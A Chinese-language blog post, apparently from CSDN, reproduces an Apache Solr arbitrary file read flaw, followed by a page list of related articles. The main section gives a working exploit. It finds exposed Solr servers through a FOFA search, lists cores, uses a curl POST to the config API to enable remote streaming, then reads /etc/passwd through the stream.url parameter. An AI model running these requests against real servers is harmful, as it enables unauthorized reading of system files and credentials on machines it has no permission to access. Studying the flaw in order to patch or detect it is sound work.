Apache Solr 任意文件读取漏洞复现

最新推荐文章于 2023-04-17 21:57:04 发布
最新推荐文章于 2023-04-17 21:57:04 发布
阅读量603 收藏 2
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全漏洞 solr
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32660043/article/details/114974057
版权

Apache Solr

Apache Solr是一个开源的搜索服务,使用Java语言开发,主要基于HTTP和Apache Lucene实现。

漏洞情报

近日skay师傅在审计solr的时候发现了一个任意文件读取漏洞,由于官方拒绝修复该漏洞,所以漏洞影响范围为Apache Solr全版本。

漏洞复现

得到漏洞情报后,我们抓紧复现下。

首先fofa搜索 app="APACHE-Solr"

打开首页:

在这里插入图片描述

我们需要先获取cores配置信息

http://target.com/solr/admin/cores?indexInfo=false&wt=json

接下来向服务器构造请求:

URL:
http://target.com/solr/db/config  //db替换为cores配置中的name参数

POST data:
{  "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}

或者使用curl:

curl -d '{  "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' http://target.com/solr/db/config -H 'Content-type:application/json'

最后构造请求读取文件:

URL:
http://target.com/solr/db/debug/dump?param=ContentStreams  //db替换为cores配置中的name参数

POST data:
stream.url=file:///etc/passwd

或者使用curl:

curl "http://target.com/solr/db/debug/dump?param=ContentStreams" -F "stream.url=file:///etc/passwd"

参考链接:
https://mp.weixin.qq.com/s/HMtAz6_unM1PrjfAzfwCUQ
https://mp.weixin.qq.com/s/iX2OasjynZ0MAvNTvIcmjg

cHr1s_h
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache-Solr 任意文件读取漏洞
不想当脚本小子的脚本小子
03-20 668
2021.3.18新出的,无CVE编号 Apache Solr是一个开源的搜索服务,使用Java语言开发,主要基于HTTP和Apache Lucene实的。它是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果 一、漏洞描述 Apache Solr 存在任意文件读取漏洞,攻击者可以在未授权的情况下获取目标服务器敏感文.
Apache Solr任意文件读取漏洞
thelostworld
03-18 785
Apache Solr任意文件读取漏洞 一、简介 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。 Apache-Solr任意文件读取漏洞漏洞,攻击者可以在未授权的情况下读取目标服务器敏感文件和相关内容。 二、影响版本 Apache Solr <= 8.8.1 三、漏洞 安装: S..
Apache Solr 任意文件读取漏洞(CNVD-2021-30146)
weixin_44047654的博客
02-22 223
Apache Solr 任意文件读取漏洞(CNVD-2021-30146)
Apache Solr 任意文件读取漏洞
dahege666的博客
05-10 2119
环境搭建 下载后解压,然后把server中的JAR拷贝到example中然后CMD打开bin目录下的solr.cmd,访问 http://ip:8093(默认) Apache Solr简介 Apache Solr是一个开源的搜索服务,使用Java语言开发,主要基于HTTP和Apache Lucene实的。它是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提
Apache Solr 任意文件读取.py
06-07
Apache Solr RemoteStreaming 任意文件读取和SSRF
Apache-Solr-EXP:Apache Solr任意文件读取EXP
03-20
这个“Apache-Solr-EXP”项目关注的是一个特定的安全漏洞,即Apache Solr任意文件读取漏洞。该漏洞允许攻击者通过精心构造的请求访问服务器上的任意文件,这可能对系统的安全性构成严重威胁。 在Python 3.8或更高...
Apache Solr最新版任意文件读取0day1
08-03
Apache Solr 是一个流行的开源全文搜索引擎,...总之,Apache Solr任意文件读取漏洞是值得注意的安全问题,尤其是在默认配置下运行的系统。为了系统的安全性,管理员应该实施严格的访问控制策略,并保持软件的更新。
Apache Solr 代码执行漏洞应急响应通告
最新发布
05-05
Apache Solr 代码执行漏洞应急响应通告
Apache Solrsolr-7.7.3.tgz)
02-05
7. **LICENSE** 和 **NOTICE**: 这些文件提供了关于Apache Solr的许可和版权信息。 在部署和使用Solr时,你需要知道如何配置Solr核心(core)以满足你的需求,这可能涉及到创建和修改`solrconfig.xml`(配置文件)...
Apache Solr stream.url 存在任意文件读取漏洞
nnn2188185的博客
04-17 342
Apache Solr是一个开源的搜索服务,使用Java语言开发。Apache Solr的某些功能存在过滤不严格,在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或文件读取漏洞
Apache Solr最新任意文件读取漏洞
蚁景网安学院
04-01 932
漏洞简介 Apache Solr是一个开源搜索服务引擎,默认安装未授权情况下攻击者可以构造恶意HTTP请求读取目标Apache Solr服务器的任意文件。 本文涉及相关实验:CVE-2019-0192 Apache Solr远程反序列化代码执行漏洞Apache Solr是一个开源的搜索服务器。具有高度可靠、可伸缩和容错的,提供分布式索引、制和负载平衡查询、自动故障转移和恢、集中配置等功能。) 影响版本 solr任意版本 环境搭建 漏洞环境下载: https://archive.apache.org/d
Apache Solr <= 8.8.1任意文件读取漏洞
不想当脚本小子的脚本小子
04-09 322
0x01 简介 ApacheSolr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。 0x02 漏洞概述 Apache Solr 存在任意文件读取漏洞,攻击者可以在未授权的情况下获取目标服务器敏感文件。 0x03 影响版本 Apache Solr <= 8.8.1 0x04 环境搭建 使用vulhub.
Apache Solr 任意文件读取漏洞详细解析
髣髴兮若轻云之蔽月
04-28 2002
Apache Solr简介 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。 PS:XML是一个文本文件,类似于HTML是一种标记语言。 API(Application Programming Interface,应用程序编程接口)是一些预先定义的函数,目的是提供应用程序与开发人员基于某软件或硬件得以访问一组例程的
Apache Solr任意文件读取和SSRF漏洞的自动化挖掘
weixin_40418457的博客
03-18 670
漏洞描述 Apache Solr是一个开源的搜索服务,使用Java语言开发。Apache Solr的某些功能存在过滤不严格,在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或文件读取漏洞。 综上,存在两个漏洞任意文件读取和SSRF,同时SSRF也可以导致任意文件读取漏洞详情 两个漏洞在同一个HTTP请求中触发,分别对应不同的参数,触发漏洞的url为http://x.x.x.x:8983/solr/new_core/debug/dump?stream.
漏洞----20、Apache Solr RemoteStreaming 任意文件读取和SSRF
七天
10-12 591
文章目录一、Apache Solr简介二、内容流与RemoteStreaming1、内容流2、RemoteStreaming三、漏洞1、访问到Apache Solr的管理控制台 一、Apache Solr简介 Apache Solr是一个功能强大的开源搜索服务器,它支持REST风格API。在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或任意文件读取。 影响版本:Apache Solr <= 8.8.1 1、下载地址: https://so
Apache Solr stream.url SSRF与任意文件读取漏洞(附pythonEXP脚本)
MD@@nr丫卡uer
03-19 859
漏洞背景 Apache Solr是一个开源的搜索服务,使用Java语言开发。 Apache Solr的某些功能存在过滤不严格,在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或文件读取漏洞。目前互联网已公开漏洞poc,建议相关用户及时采取措施阻止攻击。 fofa查询 app="APACHE-Solr" 影响范围 Apache Solr 所有版本 漏洞 首先访问,获取实例对象的名称,实例对象的名称为 gastearsivi /solr/admin/cor
"Apache Solr 组件安全概览:历史漏洞分析与防御建议
最后,本文提出了一个全版本任意文件读取漏洞的案例,该漏洞已被作者发并报告给Apache Solr官方,但官方拒绝修漏洞。因此,本文呼吁用户谨慎处理这一漏洞,建议采取相应的安全措施和风险管理措施,以确保系统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值